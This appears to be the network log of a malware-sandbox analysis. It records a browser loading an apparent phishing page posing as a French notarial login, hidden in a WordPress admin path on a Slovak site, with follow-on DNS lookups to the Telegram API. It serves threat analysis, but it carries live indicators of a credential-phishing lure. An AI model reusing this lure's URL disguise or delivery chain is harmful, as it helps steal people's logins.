                        Aug 31, 2024 00:35:47.373424053 CEST4434977188.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:47.373486996 CEST4434977188.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:47.373538971 CEST49771443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:47.374239922 CEST49771443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:47.374253988 CEST4434977188.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:47.380503893 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:47.380542994 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:47.381145000 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:47.381375074 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:47.381388903 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.068455935 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.068736076 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:48.068761110 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.069113016 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.069597960 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:48.069654942 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.069753885 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:48.116501093 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.382244110 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.382292986 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.382359982 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:48.382414103 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:48.383384943 CEST49772443192.168.2.488.212.10.20
                        Aug 31, 2024 00:35:48.383403063 CEST4434977288.212.10.20192.168.2.4
                        Aug 31, 2024 00:35:51.935693026 CEST804972387.248.204.0192.168.2.4
                        Aug 31, 2024 00:35:51.935837984 CEST4972380192.168.2.487.248.204.0
                        Aug 31, 2024 00:35:51.935930014 CEST4972380192.168.2.487.248.204.0
                        Aug 31, 2024 00:35:51.941804886 CEST804972387.248.204.0192.168.2.4
                        Aug 31, 2024 00:35:52.751662016 CEST44349748142.250.186.68192.168.2.4
                        Aug 31, 2024 00:35:52.751734018 CEST44349748142.250.186.68192.168.2.4
                        Aug 31, 2024 00:35:52.751785040 CEST49748443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:35:52.836631060 CEST49748443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:35:52.836671114 CEST44349748142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:06.778151035 CEST804972487.248.204.0192.168.2.4
                        Aug 31, 2024 00:36:06.778304100 CEST4972480192.168.2.487.248.204.0
                        Aug 31, 2024 00:36:06.778342962 CEST4972480192.168.2.487.248.204.0
                        Aug 31, 2024 00:36:06.784085989 CEST804972487.248.204.0192.168.2.4
                        Aug 31, 2024 00:36:17.875046015 CEST5517853192.168.2.4162.159.36.2
                        Aug 31, 2024 00:36:17.883249044 CEST5355178162.159.36.2192.168.2.4
                        Aug 31, 2024 00:36:17.883330107 CEST5517853192.168.2.4162.159.36.2
                        Aug 31, 2024 00:36:17.883434057 CEST5517853192.168.2.4162.159.36.2
                        Aug 31, 2024 00:36:17.892108917 CEST5355178162.159.36.2192.168.2.4
                        Aug 31, 2024 00:36:18.338186979 CEST5355178162.159.36.2192.168.2.4
                        Aug 31, 2024 00:36:18.339198112 CEST5517853192.168.2.4162.159.36.2
                        Aug 31, 2024 00:36:18.347641945 CEST5355178162.159.36.2192.168.2.4
                        Aug 31, 2024 00:36:18.347835064 CEST5517853192.168.2.4162.159.36.2
                        Aug 31, 2024 00:36:42.250123978 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:42.250159979 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.250488997 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:42.250646114 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:42.250658035 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.879210949 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.879575014 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:42.879601002 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.879936934 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.880520105 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:42.880579948 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:42.927859068 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:52.867338896 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:52.867393017 CEST44355182142.250.186.68192.168.2.4
                        Aug 31, 2024 00:36:52.867506981 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:54.426994085 CEST55182443192.168.2.4142.250.186.68
                        Aug 31, 2024 00:36:54.427033901 CEST44355182142.250.186.68192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Aug 31, 2024 00:35:37.769869089 CEST53648321.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:37.884013891 CEST53607601.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:38.915605068 CEST53583011.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:39.651810884 CEST5120553192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:39.652118921 CEST6382353192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:39.865626097 CEST53512051.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:39.890489101 CEST53638231.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.409297943 CEST6541353192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.410463095 CEST5967553192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.411570072 CEST5096553192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.412108898 CEST6105853192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.414071083 CEST53558731.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.415896893 CEST53654131.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.417030096 CEST53596751.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.450619936 CEST53610581.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.462261915 CEST53509651.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.570331097 CEST6049153192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.570684910 CEST6451153192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.571053982 CEST5939653192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.571186066 CEST5954253192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.572412968 CEST6152153192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.572530985 CEST5207853192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:41.579336882 CEST53645111.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.579737902 CEST53593961.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.580380917 CEST53595421.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.580426931 CEST53517891.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.580827951 CEST53615211.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.580869913 CEST53520781.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:41.581381083 CEST53604911.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.173775911 CEST6357053192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.174046040 CEST5654753192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.182604074 CEST53635701.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.182790041 CEST53565471.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.201234102 CEST5441853192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.201947927 CEST6025053192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.233405113 CEST53602501.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.254236937 CEST53544181.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.436202049 CEST53604131.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.451766014 CEST5794653192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.453274965 CEST5661953192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.453519106 CEST6508253192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.453871965 CEST6481053192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.461256981 CEST53579461.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.463346958 CEST53650821.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.463413000 CEST53566191.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.463845968 CEST53648101.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.487085104 CEST5145953192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.487529993 CEST5755053192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.488378048 CEST5276353192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.488831043 CEST4962353192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:42.496962070 CEST53575501.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.497173071 CEST53527631.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.497309923 CEST53514591.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.499211073 CEST53496231.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:42.744152069 CEST53623871.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:43.159775972 CEST6437653192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:43.160288095 CEST5621453192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:43.171096087 CEST53643761.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:43.182544947 CEST53562141.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:43.651526928 CEST53635941.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:44.329334974 CEST6164653192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:44.332813978 CEST5027353192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:44.365649939 CEST53502731.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:44.405009985 CEST53616461.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:46.015496016 CEST6310053192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:46.015783072 CEST6324853192.168.2.41.1.1.1
                        Aug 31, 2024 00:35:46.025820017 CEST53631001.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:46.041985989 CEST53632481.1.1.1192.168.2.4
                        Aug 31, 2024 00:35:52.694526911 CEST138138192.168.2.4192.168.2.255
                        Aug 31, 2024 00:35:56.247323036 CEST53589271.1.1.1192.168.2.4
                        Aug 31, 2024 00:36:14.980634928 CEST53513551.1.1.1192.168.2.4
                        Aug 31, 2024 00:36:17.874417067 CEST5355649162.159.36.2192.168.2.4
                        Aug 31, 2024 00:36:18.393130064 CEST53534671.1.1.1192.168.2.4
                        Aug 31, 2024 00:36:37.404804945 CEST53524971.1.1.1192.168.2.4
                        Aug 31, 2024 00:36:37.950843096 CEST53561281.1.1.1192.168.2.4
                        Aug 31, 2024 00:37:04.989756107 CEST53569321.1.1.1192.168.2.4
                        TimestampSource IPDest IPChecksumCodeType
                        Aug 31, 2024 00:35:43.187552929 CEST192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 31, 2024 00:35:39.651810884 CEST192.168.2.41.1.1.10xce86Standard query (0)www.askozvar.skA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:39.652118921 CEST192.168.2.41.1.1.10xb672Standard query (0)www.askozvar.sk65IN (0x0001)false
                        Aug 31, 2024 00:35:41.409297943 CEST192.168.2.41.1.1.10x7ff3Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.410463095 CEST192.168.2.41.1.1.10x5d59Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.411570072 CEST192.168.2.41.1.1.10xa462Standard query (0)dancinggorillas.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.412108898 CEST192.168.2.41.1.1.10xe0d5Standard query (0)dancinggorillas.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.570331097 CEST192.168.2.41.1.1.10x1a5dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.570684910 CEST192.168.2.41.1.1.10x5ca2Standard query (0)code.jquery.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.571053982 CEST192.168.2.41.1.1.10xd89eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.571186066 CEST192.168.2.41.1.1.10xfb89Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.572412968 CEST192.168.2.41.1.1.10x2881Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.572530985 CEST192.168.2.41.1.1.10xa7afStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.173775911 CEST192.168.2.41.1.1.10xb04cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.174046040 CEST192.168.2.41.1.1.10x861aStandard query (0)www.google.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.201234102 CEST192.168.2.41.1.1.10x9dbeStandard query (0)www.askozvar.skA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.201947927 CEST192.168.2.41.1.1.10xd944Standard query (0)www.askozvar.sk65IN (0x0001)false
                        Aug 31, 2024 00:35:42.451766014 CEST192.168.2.41.1.1.10x95b9Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.453274965 CEST192.168.2.41.1.1.10x7decStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.453519106 CEST192.168.2.41.1.1.10x4adfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.453871965 CEST192.168.2.41.1.1.10xddb7Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.487085104 CEST192.168.2.41.1.1.10x1fbcStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.487529993 CEST192.168.2.41.1.1.10xd470Standard query (0)code.jquery.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.488378048 CEST192.168.2.41.1.1.10x58beStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.488831043 CEST192.168.2.41.1.1.10x5cb4Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:43.159775972 CEST192.168.2.41.1.1.10xd16aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:43.160288095 CEST192.168.2.41.1.1.10xa933Standard query (0)api.telegram.org65IN (0x0001)false
                        Aug 31, 2024 00:35:44.329334974 CEST192.168.2.41.1.1.10xff97Standard query (0)dancinggorillas.comA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:44.332813978 CEST192.168.2.41.1.1.10x86beStandard query (0)dancinggorillas.com65IN (0x0001)false
                        Aug 31, 2024 00:35:46.015496016 CEST192.168.2.41.1.1.10x3316Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:46.015783072 CEST192.168.2.41.1.1.10x8b54Standard query (0)api.telegram.org65IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 31, 2024 00:35:39.865626097 CEST1.1.1.1192.168.2.40xce86No error (0)www.askozvar.sk88.212.10.20A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.415896893 CEST1.1.1.1192.168.2.40x7ff3No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.415896893 CEST1.1.1.1192.168.2.40x7ff3No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.417030096 CEST1.1.1.1192.168.2.40x5d59No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.462261915 CEST1.1.1.1192.168.2.40xa462No error (0)dancinggorillas.com34.87.236.72A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.579737902 CEST1.1.1.1192.168.2.40xd89eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.579737902 CEST1.1.1.1192.168.2.40xd89eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.580380917 CEST1.1.1.1192.168.2.40xfb89No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.580827951 CEST1.1.1.1192.168.2.40x2881No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.580827951 CEST1.1.1.1192.168.2.40x2881No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.580869913 CEST1.1.1.1192.168.2.40xa7afNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:41.581381083 CEST1.1.1.1192.168.2.40x1a5dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.581381083 CEST1.1.1.1192.168.2.40x1a5dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.581381083 CEST1.1.1.1192.168.2.40x1a5dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:41.581381083 CEST1.1.1.1192.168.2.40x1a5dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.182604074 CEST1.1.1.1192.168.2.40xb04cNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.182790041 CEST1.1.1.1192.168.2.40x861aNo error (0)www.google.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.254236937 CEST1.1.1.1192.168.2.40x9dbeNo error (0)www.askozvar.sk88.212.10.20A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.461256981 CEST1.1.1.1192.168.2.40x95b9No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.461256981 CEST1.1.1.1192.168.2.40x95b9No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.463346958 CEST1.1.1.1192.168.2.40x4adfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.463346958 CEST1.1.1.1192.168.2.40x4adfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.463413000 CEST1.1.1.1192.168.2.40x7decNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.463845968 CEST1.1.1.1192.168.2.40xddb7No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Aug 31, 2024 00:35:42.497173071 CEST1.1.1.1192.168.2.40x58beNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.497173071 CEST1.1.1.1192.168.2.40x58beNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.497309923 CEST1.1.1.1192.168.2.40x1fbcNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.497309923 CEST1.1.1.1192.168.2.40x1fbcNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.497309923 CEST1.1.1.1192.168.2.40x1fbcNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.497309923 CEST1.1.1.1192.168.2.40x1fbcNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:42.499211073 CEST1.1.1.1192.168.2.40x5cb4No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                        Aug 31, 2024 00:35:43.171096087 CEST1.1.1.1192.168.2.40xd16aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:44.405009985 CEST1.1.1.1192.168.2.40xff97No error (0)dancinggorillas.com34.87.236.72A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:46.025820017 CEST1.1.1.1192.168.2.40x3316No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.35A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.26A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.43A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.24A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.42A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:50.827857018 CEST1.1.1.1192.168.2.40xb84No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:35:53.163362980 CEST1.1.1.1192.168.2.40xac59No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Aug 31, 2024 00:35:53.163362980 CEST1.1.1.1192.168.2.40xac59No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:36:11.328349113 CEST1.1.1.1192.168.2.40x65b9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Aug 31, 2024 00:36:11.328349113 CEST1.1.1.1192.168.2.40x65b9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:36:30.062189102 CEST1.1.1.1192.168.2.40x22b1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Aug 31, 2024 00:36:30.062189102 CEST1.1.1.1192.168.2.40x22b1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        Aug 31, 2024 00:36:50.542573929 CEST1.1.1.1192.168.2.40x9c61No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Aug 31, 2024 00:36:50.542573929 CEST1.1.1.1192.168.2.40x9c61No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        • www.askozvar.sk
                        • https:
                          • maxcdn.bootstrapcdn.com
                          • cdnjs.cloudflare.com
                          • code.jquery.com
                          • stackpath.bootstrapcdn.com
                          • dancinggorillas.com
                          • api.telegram.org
                        • fs.microsoft.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973688.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:40 UTC740OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-User: ?1
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:41 UTC282INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:40 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Thu, 04 Jan 2024 22:28:58 GMT
                        ETag: "425dd-60e2641ef1e80"
                        Accept-Ranges: bytes
                        Content-Length: 271837
                        Vary: Accept-Encoding
                        Content-Type: text/html
                        2024-08-30 22:35:41 UTC16384INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 6c 61 6e 73 20 41 72 63 68 69 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 20 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70
                        Data Ascii: <html><head> <meta charset="UTF-8" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"> <title>Plans Archi</title> <link rel="stylesheet prefetch" href="https://fonts.googleap
                        2024-08-30 22:35:41 UTC16384INData Raw: 41 41 41 41 41 41 41 41 4a 49 52 6b 44 51 41 41 41 41 41 41 51 45 4a 49 31 67 41 41 41 41 41 41 41 43 53 45 5a 41 30 41 41 41 41 41 41 45 42 43 53 4e 59 41 41 41 41 41 41 41 41 6b 68 47 51 4e 41 41 41 41 41 41 42 41 51 6b 6a 57 41 41 41 41 41 41 41 41 4a 49 52 6b 44 51 41 41 41 41 41 41 51 45 4a 49 31 67 41 41 41 41 41 41 41 43 53 45 5a 41 30 41 41 41 41 41 41 45 42 43 53 4e 59 41 41 41 41 41 41 41 41 6b 68 47 51 4e 41 41 41 41 41 41 42 41 51 6b 6a 57 41 41 41 41 41 41 41 41 4a 49 52 6b 44 51 41 41 41 41 41 41 51 45 4a 49 31 67 41 41 41 41 41 41 41 43 53 45 5a 41 30 41 41 41 41 41 41 45 42 43 53 4e 59 41 41 41 41 41 41 41 41 6b 68 47 51 4e 41 41 41 41 41 41 42 41 51 6b 6a 57 41 41 41 41 41 41 41 41 4a 49 52 6b 44 51 41 41 41 41 41 41 51 45 4a 49 31 67 41
                        Data Ascii: AAAAAAAAJIRkDQAAAAAAQEJI1gAAAAAAACSEZA0AAAAAAEBCSNYAAAAAAAAkhGQNAAAAAABAQkjWAAAAAAAAJIRkDQAAAAAAQEJI1gAAAAAAACSEZA0AAAAAAEBCSNYAAAAAAAAkhGQNAAAAAABAQkjWAAAAAAAAJIRkDQAAAAAAQEJI1gAAAAAAACSEZA0AAAAAAEBCSNYAAAAAAAAkhGQNAAAAAABAQkjWAAAAAAAAJIRkDQAAAAAAQEJI1gA
